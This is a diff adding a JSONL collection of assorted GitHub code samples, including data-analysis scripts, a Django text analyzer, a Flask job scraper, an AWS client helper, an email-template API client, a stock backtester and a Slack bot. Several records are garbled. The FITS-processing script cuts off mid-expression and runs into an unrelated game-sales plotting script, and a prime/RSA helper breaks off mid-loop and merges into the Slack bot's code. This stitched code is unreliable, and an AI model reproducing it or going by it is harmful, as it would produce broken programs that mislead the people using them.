diff --git "a/5357.jsonl" "b/5357.jsonl" new file mode 100644--- /dev/null +++ "b/5357.jsonl" @@ -0,0 +1,905 @@ +{"seq_id":"39099754216","text":"#Crie um programa que utilize o NumPy para calcular a média de vendas nos primeiros 10 dias \n#e verificar se houve algum dia em que as vendas foram maiores que 1000.\n\nimport numpy as np\n\nvendas = []\n\nfor i in range(10):\n valor_vendas = float(input(f'Qual o valor das vendas de hoje {i+1}: '))\n vendas.append(valor_vendas)\n\n\nvendas = np.array(vendas)\nmedia_vendas = np.mean(vendas[:10])\n\nmedia_acima_mil = vendas[vendas > 1000]\n\nprint(vendas)\nprint(media_vendas)\nprint(media_acima_mil)\n\n \n","repo_name":"Palomafreiire/AnaliseDeDados","sub_path":"aula 7/exercicioBR4.py","file_name":"exercicioBR4.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74025665474","text":"\nimport boto3\nfrom botocore.exceptions import ClientError\nimport logging\n\nclass AWSUtils(object):\n\n def __init__(self, id, key):\n\n self.id = id\n self.key = key\n\n def s3_client(self) :\n \n # try:\n client_s3 = boto3.client(\n 's3',\n aws_access_key_id = self.id,\n aws_secret_access_key = self.key,\n )\n\n # except ClientError as e:\n # logging.error(e)\n\n return client_s3\n\n @classmethod\n def ssm_client(cls, id, key, region) :\n\n cls.id = id\n cls.key = key\n cls.region = region\n\n client_ssm = boto3.client(\n 'ssm',\n aws_access_key_id = cls.id,\n aws_secret_access_key = cls.key,\n region_name = cls.region\n )\n\n return client_ssm","repo_name":"sof2000/python-cassandra-cli","sub_path":"python_cassandra_cli/aws_utils.py","file_name":"aws_utils.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42759703658","text":"import fitsio as fits\nimport numpy as np\nimport glob\nfrom tqdm import tqdm\nimport os\nfrom scipy.ndimage.filters import maximum_filter1d\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-i', '--input')\nargs = parser.parse_args()\n\nindir = os.path.join(args.input)\noutdir = os.path.join('processed', indir)\nos.makedirs(outdir, exist_ok=True)\nfiles = glob.glob(os.path.join(indir,'*.fits'))\n\nwindow = 50\nmax_len = 400\n\nfor filename in tqdm(files):\n try:\n data = fits.read(filename, ext=None)\n except:\n continue\n data = data.astype([(x, '= 2000]\r\n\r\n#Print the games DataFrame\r\n#print(games.loc[:, \"Platform\":\"Year_of_Release\"])\r\n\r\n#Change style\r\nsns.set_style(\"whitegrid\")\r\n\r\n#A variable for the age ratings in order\r\nratings_order = [\"E\", \"E10+\", \"T\", \"M\", \"AO\", \"RP\"]\r\n\r\n#Plot global sales by age rating\r\nage = sns.catplot(data = games,\r\n y = \"Global_Sales\",\r\n x = \"Rating\",\r\n kind = \"bar\",\r\n order = ratings_order)\r\n\r\n#Annotate the plot\r\nage.fig.suptitle(\"Sales of Each Age Rating Group\")\r\nage.set(xlabel = \"Age Ratings\",\r\n ylabel = \"Sales in Millions\")\r\n\r\n#Save the global sales plot\r\nage.savefig(\"Age_Global_Sales.png\")\r\n\r\n#Create a 2x2 subplot\r\nfig, ax = plt.subplots(2, 2, figsize = (8, 9.5))\r\n\r\n#A function to plot the sales by region\r\ndef plot_sales(axis, sales, colour, country):\r\n sns.barplot(ax = axis,\r\n data = games,\r\n x = \"Rating\",\r\n y = sales,\r\n estimator = sum,\r\n order = ratings_order,\r\n color = colour,\r\n ci = None)\r\n axis.set_xlabel(\"Age Rating\")\r\n axis.set_ylabel(\"Sales in 
Millions\")\r\n axis.set_title(\"Sales in \" + country, color = colour)\r\n\r\n#Ploting the regional sales\r\nplot_sales(ax[0, 0], \"NA_Sales\", \"red\", \"North America\")\r\nplot_sales(ax[0, 1], \"EU_Sales\", \"blue\", \"Europe\")\r\nplot_sales(ax[1, 0], \"JP_Sales\", \"green\", \"Japan\")\r\nplot_sales(ax[1, 1], \"Other_Sales\", \"purple\", \"Other Countries\")\r\n\r\n#Save regional sales figure\r\nfig.savefig(\"Sales by Region.png\")\r\n\r\n#Convert the User Score column to a float\r\ngames[\"User_Score\"] = games[\"User_Score\"].astype(float)\r\n\r\n#Create plot to compare user vs critic score\r\nfig2, ax2 = plt.subplots(1, 2, figsize = (12, 6))\r\n\r\n#Create regression plots for user vs critic score\r\n#Plot User scores vs sales\r\nsns.regplot(ax = ax2[0],\r\n data = games,\r\n x = \"User_Score\",\r\n y = \"Global_Sales\",\r\n scatter_kws = {\"color\":\"red\", \"alpha\":0.2},\r\n line_kws = {\"color\":\"black\", \"alpha\":1})\r\nax2[0].set_xlabel(\"Average User Scores by Metacritic Subscribers\")\r\nax2[0].set_ylabel(\"Sales in Millions\")\r\n#Plot critic scores vs sales\r\nsns.regplot(ax = ax2[1],\r\n data = games,\r\n x = \"Critic_Score\",\r\n y = \"Global_Sales\",\r\n scatter_kws = {\"color\":\"green\", \"alpha\":0.2},\r\n line_kws = {\"color\":\"black\", \"alpha\":1})\r\nax2[1].set_xlabel(\"Average Score on Metacritic by Professional Critics\")\r\nax2[1].set_ylabel(\"Sales in Millions\")\r\n#Add titles\r\nfig2.suptitle(\"How Sales are Affected by User Scores vs Critic Scores\")\r\n\r\n#Save the sales vs scores graph\r\nfig2.savefig(\"Critic v User score\")\r\n\r\n#Create separate dataframes for individual genres\r\nshooter = games[games[\"Genre\"] == \"Shooter\"]\r\nplatformer = games[games[\"Genre\"] == \"Platform\"]\r\nsport = games[games[\"Genre\"] == \"Sports\"]\r\nsim = games[games[\"Genre\"] == \"Simulation\"]\r\n#Merge the different genre dataframes\r\nframes = [shooter, platformer, sport, sim]\r\ngenre_df = pd.concat(frames)\r\n\r\n#plot a line plot for the genres\r\ngenre_graph = sns.catplot(data = genre_df,\r\n x = \"Year_of_Release\",\r\n y = \"Global_Sales\",\r\n kind = \"point\",\r\n ci = None,\r\n hue = \"Genre\",\r\n alpha = 0.8,\r\n estimator = sum)\r\n\r\ngenre_graph.fig.suptitle(\"Sales in Various Genres from 2000-2016\")\r\ngenre_graph.set(xlabel = \"Year of Release\",\r\n ylabel = \"Average Sales of Games in Millions\")\r\ngenre_graph.set_xticklabels(rotation = 45)\r\n\r\n#Save the genre sales graph\r\ngenre_graph.savefig(\"Sales by Genre.png\")\r\n\r\n#Display plots\r\nplt.show()","repo_name":"jjcondon001/UCDPA_JamesCondon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40110656091","text":"# This file is created by Rahul Gupta\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request, 'index.html')\n\ndef textanalyzed(request):\n textareatext = request.POST.get('entertext', 'default')\n # print(textareatext)\n removepun = request.POST.get('removepun', 'off')\n # print(removepun)\n lowercase = request.POST.get('lowercase', 'off')\n # print(lowercase)\n uppercase = request.POST.get('uppercase', 'off')\n # print(uppercase)\n charcount = request.POST.get('charcount', 'off')\n # print(charcount)\n wordcount = request.POST.get('wordcount', 'off')\n # print(wordcount)\n sentencecount = request.POST.get('sentencecount', 'off')\n # print(sentencecount)\n 
extraspaceremove = request.POST.get('extraspaceremove', 'off')\n # print(extraspaceremove)\n newlineremove = request.POST.get('newlineremove', 'off')\n # print(newlineremove)\n numberremove = request.POST.get('numberremove','off')\n # print(numberremove)\n\n if(removepun == 'on'):\n punctuation = '''\n !()-[]{};:'\"\\,<>./?@#$%^&*_~\n '''\n analyzed = \"\"\n for i in textareatext:\n if i not in punctuation:\n analyzed = analyzed + i\n printtext = {'purpose':'Removed Punctuation', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html',printtext)\n \n if(lowercase == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = analyzed + i.lower()\n printtext = {'purpose':'All Letter lowercase','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if (uppercase == 'on'):\n analyzed = \"\" \n for i in textareatext:\n analyzed = analyzed + i.upper()\n printtext = {'purpose':'Upper Case Letter','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if(charcount == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = len(textareatext)\n printtext={'purpose':'Count the Character','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if(wordcount == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = len(textareatext.split())\n printtext = {'purpose':'Count the Word', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n \n if(sentencecount =='on'):\n analyzed = \"\"\n print(textareatext)\n for i in textareatext:\n analyzed1 = len(textareatext.split('.'))\n analyzed1=analyzed1-1\n analyzed2 = len(textareatext.split('?'))\n analyzed2=analyzed2-1\n analyzed3 = len(textareatext.split('!'))\n analyzed3=analyzed3-1\n analyzed = analyzed1 + analyzed2 + analyzed3\n printtext = {'purpose':'Count the sentence','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if extraspaceremove == 'on':\n analyzed=\"\"\n for index, i in enumerate(textareatext):\n if not(textareatext[index]==\" \" and textareatext[index+1]==\" \"):\n analyzed = analyzed + i\n printtext = {'purpose':'Removed extra space', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n \n if newlineremove == 'on':\n analyzed=\"\"\n for i in textareatext:\n if i !='\\n':\n analyzed = analyzed + i\n printtext = {'purpose':'Removed new line', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext) \n\n if (numberremove == \"on\"):\n analyzed = \"\"\n numbers = '0123456789'\n\n for i in textareatext:\n if i not in numbers:\n analyzed = analyzed + i\n \n printtext = {'purpose': 'Removed Numbers', 'analyzed_text': analyzed}\n textareatext = analyzed\n \n if(removepun!=\"on\" and lowercase!=\"on\" and uppercase!=\"on\" and charcount!=\"on\" and wordcount!=\"on\" and sentencecount!=\"on\" and extraspaceremove!=\"on\" and newlineremove!=\"on\" and numberremove!=\"on\"):\n return HttpResponse(\"Error\")\n\n return render(request, 'textanalyzed.html', printtext)\n\n\ndef about(request):\n return render(request, 'about.html')\n\ndef contact(request):\n return render(request, 
'contact.html')","repo_name":"rahulgupta020/TextAnalyzer","sub_path":"TextAnalyze/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18123327765","text":"import os\nfrom flask import Flask,render_template,request,send_file\nfrom so import get_so_jobs\nfrom rm import get_rm_jobs\nfrom we import get_we_jobs\nfrom save import save_to_file\n\nos.system('clear')\n\napp = Flask(\"JobScrapper\")\n\ndb={}\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/search\")\ndef search():\n term = request.args.get('term')\n if term:\n term = term.lower()\n fromDB = db.get(term)\n if fromDB:\n jobs = fromDB\n else:\n so_jobs = get_so_jobs(term)\n we_jobs = get_we_jobs(term)\n rm_jobs = get_rm_jobs(term)\n jobs = so_jobs + we_jobs + rm_jobs\n db[term] = jobs\n else:\n return redirect(\"/\")\n return render_template(\"search.html\",term = term, resultNum = len(jobs), jobs=jobs)\n\n@app.route(\"/export\")\ndef export():\n try:\n term = request.args.get('term')\n if not term:\n raise Exception()\n term = term.lower()\n jobs = db.get(term)\n if not jobs:\n raise Exception()\n save_to_file(jobs,term)\n return send_file(f\"{term}.csv\", mimetype=\"text/csv\",attachment_filename=f\"{term}.csv\", as_attachment=True)\n except:\n return redirect(\"/\")\n \n \napp.run(host = \"0.0.0.0\")\n","repo_name":"1eq0/JobScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18743929659","text":"import healpy as hp\nimport cosmoglobe\nimport astropy.units as u\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nw = 5\nf = {\"rlabel\": 6, \"llabel\": 6}\n\nf = 12\n\n\ndef mylabel(rlabel, fontsize):\n ax = plt.gca()\n plt.text(\n 0.025,\n 1.05,\n rlabel,\n ha=\"left\",\n va=\"center\",\n fontsize=fontsize,\n transform=ax.transAxes,\n )\n\n\ntry:\n d_100_s = hp.read_map(\"npipe_100_2deg.fits\", field=(0, 1, 2))\nexcept FileNotFoundError:\n d_100 = hp.read_map(\n \"/mn/stornext/d16/cmbco/ola/npipe/freqmaps/npipe6v20_100_map_K.fits\",\n field=(0, 1, 2),\n )\n d_100_s = 1e6 * hp.ud_grade(hp.smoothing(d_100, fwhm=2 * np.pi / 180), 512)\n hp.write_map(\"npipe_100_2deg.fits\", d_100_s)\n\n\nDIR = \"/mn/stornext/d16/www_cmb/dwatts/v0\"\nd_W1 = hp.read_map(f\"{DIR}/BP_090-WMAP_W1_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W2 = hp.read_map(f\"{DIR}/BP_090-WMAP_W2_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W3 = hp.read_map(f\"{DIR}/BP_090-WMAP_W3_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W4 = hp.read_map(f\"{DIR}/BP_090-WMAP_W4_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W = (\n d_W1[:3] / d_W1[3:] ** 2\n + d_W2[:3] / d_W2[3:] ** 2\n + d_W3[:3] / d_W3[3:] ** 2\n + d_W4[:3] / d_W4[3:] ** 2\n) / (1 / d_W1[3:] ** 2 + 1 / d_W2[3:] ** 2 + 1 / d_W3[3:] ** 2 + 1 / d_W4[3:] ** 2)\n\n\nd_W_s = hp.smoothing(d_W, fwhm=2 * np.pi / 180)\nd_W_s = 1e3 * d_W_s\n\nd_W_orig = hp.read_map(\n \"/mn/stornext/d16/cmbco/ola/wmap/freq_maps/wmap_band_iqusmap_r9_9yr_W_v5.fits\",\n field=(0, 1, 2),\n)\nd_W_o_s = 1e3 * hp.smoothing(d_W_orig, fwhm=2 * np.pi / 180)\n\ncosmoglobe.standalone_colorbar(\n \"planck\", ticks=[-10, 0, 10], unit=r\"$\\mathrm{\\mu K}$\", extend=\"both\"\n)\nplt.savefig(\"cbar.png\", bbox_inches=\"tight\", dpi=300)\n\ncosmoglobe.plot(-d_100_s + d_W_o_s, sig=1, min=-10, max=10, cbar=False, 
width=w)\nmylabel(\"$\\mathit{WMAP9}-\\mathit{Planck}\\ 100\\,\\mathrm{GHz}$\", f)\nplt.savefig(\"diff_orig.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(-d_100_s + d_W_s, sig=1, min=-10, max=10, width=w, cbar=False)\nmylabel(r\"$\\mathrm{Watts\\ et\\ al.}-\\mathit{Planck}\\ 100\\,\\mathrm{GHz}$\", f)\nplt.savefig(\"diff_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_W_s, sig=1, min=-10, max=10, unit=r\"$\\mathrm{\\mu K}$\", cbar=False, width=w\n)\nmylabel(r\"$\\mathrm{Watts\\ et\\ al.}$\", f)\nplt.savefig(\"W_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_W_o_s,\n sig=1,\n min=-10,\n max=10,\n unit=r\"$\\mathrm{\\mu K}$\",\n cbar=False,\n width=w,\n llabel=r\"\\mathit{WMAP9}\",\n)\nplt.savefig(\"W_WMAP_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_100_s,\n sig=1,\n min=-10,\n max=10,\n unit=r\"$\\mathrm{\\mu K}$\",\n cbar=True,\n width=w,\n llabel=r\"\\mathit{Planck}\\ 100\\,\\mathrm{GHz}\",\n)\nplt.savefig(\"npipe_100.png\", bbox_inches=\"tight\", dpi=300)\n","repo_name":"Cosmoglobe/Commander","sub_path":"commander3/todscripts/wmap/presentation_figures/comp_W_100.py","file_name":"comp_W_100.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"4304114637","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom sendcloud import APIBaseClass\n\n\nclass SendCloudTemplate(APIBaseClass):\n\n def __init__(self, invoke_name, fail_silently=False, *args, **kwargs):\n _edm_user = kwargs.pop('edm_user', None)\n self.invoke_name = invoke_name\n try:\n self._edm_user = _edm_user or getattr(settings, 'MAIL_EDM_USER')\n except AttributeError:\n if fail_silently:\n self._edm_user = None\n else:\n raise\n\n self.get_url = 'http://sendcloud.sohu.com/webapi/template.get.json'\n self.add_url = 'http://sendcloud.sohu.com/webapi/template.add.json'\n self.update_url = 'http://sendcloud.sohu.com/webapi/template.update.json'\n self.send_url = 'http://sendcloud.sohu.com/webapi/mail.send_template.json'\n self.delete_url = 'http://sendcloud.sohu.com/webapi/template.delete.json'\n super(SendCloudTemplate, self).__init__(*args, **kwargs)\n\n @property\n def edm_user(self):\n return self._edm_user\n\n def get_or_create(self, **kwargs):\n if not self.get_status():\n self.add(**kwargs)\n\n def update_or_create(self, **kwargs):\n if not self.get_status():\n self.add(**kwargs)\n else:\n self.update(**kwargs)\n\n def get_status(self):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name\n }\n\n res = self.post_api(self.get_url, data)\n\n if len(res['templateList']) == 0:\n return False\n try:\n template_info = res['templateList'][0]\n return template_info['is_verify']\n except Exception:\n if not self.fail_silently:\n raise\n return False\n\n def add(self, name, html, subject, email_type=1):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n 'name': name,\n 'html': html,\n 'subject': subject,\n 'email_type': email_type\n }\n return self.post_api(self.add_url, data)\n\n def update(self, name, html, subject, email_type=1):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n 'name': name,\n 'html': html,\n 'subject': subject,\n 'email_type': email_type\n }\n return self.post_api(self.update_url, data)\n\n def delete(self):\n data = {\n 'api_user': self.api_user,\n 
'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n }\n res = self.post_api(self.delete_url, data)\n return res\n\n def send_to_list(self, subject, from_mail, from_name, to):\n data = {\n 'api_user': self.edm_user,\n 'api_key': self.api_key,\n 'use_maillist': 'true',\n 'resp_email_id': 'true',\n 'template_invoke_name': self.invoke_name,\n 'subject': subject,\n 'to': to,\n \"from\": from_mail,\n \"mail_from\": from_mail,\n \"fromname\": from_name,\n }\n return self.post_api(self.send_url, data)\n","repo_name":"guoku/django-sendcloud","sub_path":"sendcloud/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"15481470760","text":"import numpy as np\nimport pandas as pd\nimport quandl # Necessary for obtaining financial data easily\nimport json\nimport time\nfrom yahoofinancials import YahooFinancials as YF\nimport time\nimport pandas as pd\n# from pandas_datareader import data\nimport os\nimport pickle\nfrom tqdm import tqdm\nimport scipy.stats as sp\nfrom backtest import Strategy, Portfolio\nimport os\nfrom fbprophet import Prophet\nfrom utils import *\n\n\nclass RandomStrategy(Strategy):\n \"\"\"Derives from Strategy to produce a set of signals that\n are randomly generated long/shorts. Clearly a nonsensical\n strategy, but perfectly acceptable for demonstrating the\n backtesting infrastructure!\"\"\"\n\n def __init__(self, tickers, bars, strategy):\n \"\"\"Requires the symbol ticker and the pandas DataFrame of bars\"\"\"\n self.tickers = tickers\n self.bars = bars\n self.strategy = strategy\n\n def genSignals(self):\n # uses the first stock in stocks to set the index for the signals df\n signals = pd.DataFrame(index=self.bars[next(iter(self.bars))].index)\n # for stock in list(self.bars):\n # signals[stock] = self.strategy(self.bars[stock])\n # #signals[stock] = 1 #np.sign(np.random.randn(len(signals)))\n # signals[stock][0:5] = 0.0\n for strat in self.strategy:\n if (strat['name'] == 'MACDStrat'):\n print('MACDStrat')\n signals = self.MACDStrat(\n signals, strat['params']['short'], strat['params']['long'])\n elif (strat['name'] == 'single'):\n print('single')\n signals = self.singleStockStrat(\n signals, strat['params']['ticker'])\n elif (strat['name'] == 'weighted'):\n print(strat['params'].weights)\n signals = self.weightedStrat(\n signals, strat['params'].weights)\n return signals\n\n def MACDStrat(self, signals, short, long):\n self.bars = addMACD(self.bars, short, long)\n for stock in list(self.bars):\n signal = np.sign(self.bars[stock]['macd_signal'])\n signals[stock] = signal\n return signals\n\n def singleStockStrat(self, signals, ticker):\n stocks = self.bars\n for stock in list(stocks):\n if (stock == ticker):\n signals[stock] = 1\n else:\n signals[stock] = 0\n # signals[stock] = 1 #np.sign(np.random.randn(len(signals)))\n signals[stock][0:1] = 0.0\n return signals\n\n def weightedStrat(self, signals, weights):\n # for i in range(0, len(list(self.bars.keys()))):\n # symbol = list(self.bars.keys())[i]\n # signals[symbol] = weights[i]\n # signals[symbol][0:1] = 0.0\n print(weights)\n for stock, weight in weights.items():\n signals[stock] = weight\n signals[stock][0:1] = 0.0\n return signals\n\n\nclass MyPortfolio(Portfolio):\n \"\"\"Inherits Portfolio to create a system that purchases 100 units of \n a particular symbol upon a long/short signal, assuming the market \n open price of a bar.\n\n In addition, there are zero transaction 
costs and cash can be immediately \n borrowed for shorting (no margin posting or interest requirements). \n\n Requires:\n symbol - A stock symbol which forms the basis of the portfolio.\n bars - A DataFrame of bars for a symbol set.\n signals - A pandas DataFrame of signals (1, 0, -1) for each symbol.\n initial_capital - The amount in cash at the start of the portfolio.\"\"\"\n\n def __init__(self, tickers, bars, signals, initial_capital=1000):\n self.tickers = tickers\n self.bars = bars\n self.signals = signals\n self.initial_capital = float(initial_capital)\n self.positions = signals\n self.forecast = {}\n self.lastDate = ''\n\n def generate_positions(self):\n for stock in list(self.tickers):\n self.signals[stock+\"_position\"] = 1*self.signals[stock]\n self.signals[stock +\n '_pos_diff'] = self.signals[stock+\"_position\"].diff()\n return self.signals\n\n def forecast_positions(self):\n for stock in list(self.tickers):\n self.signals[stock+\"_position\"] = 1*self.signals[stock]\n self.signals[stock +\n '_pos_diff'] = self.signals[stock+\"_position\"].diff()\n return self.signals\n\n def backtest_portfolio(self):\n holdings_col = []\n for stock in list(self.tickers):\n #positions[stock+\"_price\"] = stocks[stock].Open\n holdings_col.append(stock+\"_holdings\")\n self.positions[stock+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock].Open)\n self.positions[stock+\"_holdings\"] = self.bars[stock].Open * \\\n self.positions[stock+'_position']\n self.positions[stock+'_open'] = self.bars[stock].Open\n self.positions[stock+'_close'] = self.bars[stock].Close\n\n # get total holdings, and cash flow\n self.positions['holdings'] = self.positions[holdings_col].sum(axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in holdings_col]].sum(axis=1)\n self.positions['cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['total'] = self.positions['cash'] + \\\n self.positions['holdings']\n self.positions['returns'] = self.positions['total'].pct_change()\n self.positions['date'] = self.positions.index.strftime(\"%m/%d/%Y\")\n self.positions = self.positions.fillna(0)\n return self.positions\n\n def backtest_forecast(self):\n holdings_col = []\n upper_holdings = []\n lower_holdings = []\n for stock in list(self.tickers):\n #positions[stock+\"_price\"] = stocks[stock].Open\n holdings_col.append(stock+\"_holdings\")\n self.positions[stock+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat'])\n self.positions[stock+\"_holdings\"] = self.bars[stock]['yhat'] * \\\n self.positions[stock+'_position']\n \n # self.positions[stock+'_open'] = self.bars[stock]['yhat_upper']\n # self.positions[stock+'_close'] = self.bars[stock]['yhat_upper']\n\n # upper\n col_name = stock + '_yhat_upper'\n upper_holdings.append(col_name+\"_holdings\")\n self.positions[col_name+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat_upper'])\n self.positions[col_name+\"_holdings\"] = self.bars[stock]['yhat_upper'] * \\\n self.positions[stock+'_position']\n self.positions[col_name] = self.bars[stock]['yhat_upper']\n\n # lower\n col_name = stock + '_yhat_lower'\n lower_holdings.append(col_name+\"_holdings\")\n self.positions[col_name+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat_lower'])\n self.positions[col_name+\"_holdings\"] = self.bars[stock]['yhat_lower'] * \\\n self.positions[stock+'_position']\n self.positions[col_name] = self.bars[stock]['yhat_lower']\n\n # get 
total holdings, and cash flow\n self.positions['forecasted_holdings'] = self.positions[holdings_col].sum(axis=1)\n self.positions['forecasted_cash_diff'] = self.positions[[x.replace('_holdings', '_cash') for x in holdings_col]].sum(axis=1)\n self.positions['forecasted_cash'] = self.initial_capital - \\\n self.positions['forecasted_cash_diff'].cumsum()\n self.positions['forecasted_total'] = self.positions['forecasted_cash'] + \\\n self.positions['forecasted_holdings']\n self.positions['forecasted_returns'] = self.positions['forecasted_total'].pct_change()\n self.positions['date'] = self.positions.index.strftime(\"%m/%d/%Y\")\n\n # upper\n self.positions['upper_holdings'] = self.positions[upper_holdings].sum(\n axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in upper_holdings]].sum(axis=1)\n self.positions['upper_cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['upper_total'] = self.positions['upper_cash'] + \\\n self.positions['upper_holdings']\n self.positions['upper_returns'] = self.positions['upper_total'].pct_change()\n\n # lower\n self.positions['lower_holdings'] = self.positions[lower_holdings].sum(\n axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in lower_holdings]].sum(axis=1)\n self.positions['lower_cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['lower_total'] = self.positions['lower_cash'] + \\\n self.positions['lower_holdings']\n self.positions['lower_returns'] = self.positions['lower_total'].pct_change()\n\n self.positions = self.positions.fillna(0)\n\n return self.positions\n\n def forecast_portfolio(self):\n col_name = 'Open'\n for stock in list(self.bars):\n df = self.prophetDf(self.bars[stock], col_name)\n prophet, forecast = self.createForecast(df)\n self.bars[stock] = self.bars[stock].rename(columns={\n 'y': col_name,\n 'ds':'Date'\n })\n # forecast = forecast.rename(columns={\n # 'yhat':'Open',\n\n # })\n\n # forecast = forecast[cols_wanted][forecast.index > '2021-03-12'].fillna(0)\n # self.forecast[stock] = pd.concat([self.bars[stock],forecast], axis=1)\n\n #self.forecast[stock] = self.forecast[stock].fillna(0)\n cols_wanted = ['yhat', 'yhat_upper', 'yhat_lower']\n last_date = self.bars[stock].index[-2]\n self.forecast[stock] = forecast[cols_wanted][forecast.index > last_date].fillna(0)\n return self.forecast\n\n def createForecast(self, df):\n corona_prophet = Prophet(\n changepoint_prior_scale=0.15, weekly_seasonality=False, yearly_seasonality=False)\n corona_prophet.add_seasonality(\n 'self_define_cycle', period=8, fourier_order=8, mode='additive')\n corona_prophet.fit(df)\n # Make a future dataframe for 6 months\n corona_forecast = corona_prophet.make_future_dataframe(\n periods=20, freq='D')\n # Make predictions\n corona_forecast = corona_prophet.predict(corona_forecast)\n corona_forecast.index = corona_forecast['ds']\n corona_forecast.drop(['ds'], axis=1, inplace=True)\n #corona_forecast = corona_forecast.rename(columns={'yhat':'Open'})\n return corona_prophet, corona_forecast\n\n def prophetDf(self, closeDf, col_name):\n closeDf.rename(columns={\"Date\": \"ds\", col_name: \"y\"}, inplace=True)\n closeDf['ds'] = closeDf.index\n return closeDf\n","repo_name":"lucasdmoyer/two-dolla","sub_path":"backtester.py","file_name":"backtester.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"9816777297","text":"import random\nfrom math import gcd as bltin_gcd\nfrom textwrap import wrap\n\ndef isPrime(n):\n if n==2 or n==3: return True\n if n%2==0 or n<2: return False\n for i in range(3, int(n**0.5)+1, 2):\n if n%i==0:\n return False\n return True\n\ndef isCoprime(a, b):\n return bltin_gcd(a, b) == 1\n\ndef getE(phi):\n possiblyNumber = random.randint(3, phi)\n while not isPrime(possiblyNumber) and not isCoprime(possiblyNumber, phi):\n possiblyNumber = random.randint(3, phi)\n return possiblyNumber\n\ndef getD(e,phi):\n possiblyNumber = 3\n while (e*possiblyNumber % phi) != 1 and possiblyNumber 50:\n return response[1]\n else:\n return f'No suitable match for: \"{usr_txt}\". Please rewrite your request.'\n\n## \n def _get_formatted_id(self, usr_txt):\n puncts = \"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\n for wrd in usr_txt.split(): \n for p in puncts:\n wrd = wrd.replace(p, '')\n\n if not wrd.isalpha():\n return wrd.upper()\n else:\n return f\"No Rally IDs found in: {usr_txt}\" \n##\n def _handle_command(self, user, usr_txt):\n response = '<@' + user + '> '\n _CMD = self._find_command(usr_txt)\n print(_CMD)\n _ID = self._get_formatted_id(usr_txt)\n print(_ID)\n\n if usr_txt in self.hidden_commands:\n response += self.hidden_commands[usr_txt]()\n elif _CMD in self.commands:\n if _CMD in ('estimate'):\n response += self.commands[_CMD](_ID, 'PE')\n elif _CMD in ('name'):\n response += self.commands[_CMD](_ID, 'N')\n elif _CMD in ('owner'):\n response += self.commands[_CMD](_ID, 'O')\n elif _CMD in ('state'):\n response += self.commands[_CMD](_ID, 'KSA')\n 